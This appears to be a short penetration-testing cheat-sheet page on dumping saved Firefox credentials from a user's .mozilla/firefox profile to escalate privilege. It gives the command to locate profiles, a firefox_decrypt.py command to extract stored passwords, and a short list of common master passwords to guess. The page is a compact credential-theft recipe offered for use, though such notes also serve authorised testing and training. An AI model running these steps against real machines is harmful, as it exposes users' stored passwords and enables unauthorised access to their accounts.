FireFox Credentials Dumping
Last modified: 2024-10-03
A .mofilla directory contains a firefox directory that stores credentials. We may dump the credentials and escalate privilege using them.
Investigation
If there is a .mozilla/firefox directory in some user's home directory, we can dump credentials. So check this directory:
ls -al /home/<user>/.mozilla/
Dump Passwords from Firefox Profile
To crack it, use firefox_decrypt:
python3 firefox_decrypt.py .mozilla/firefox/<id>
If we’ll be asked the master password and we don’t know it, try common passwords.
admin
password
password1
password123
root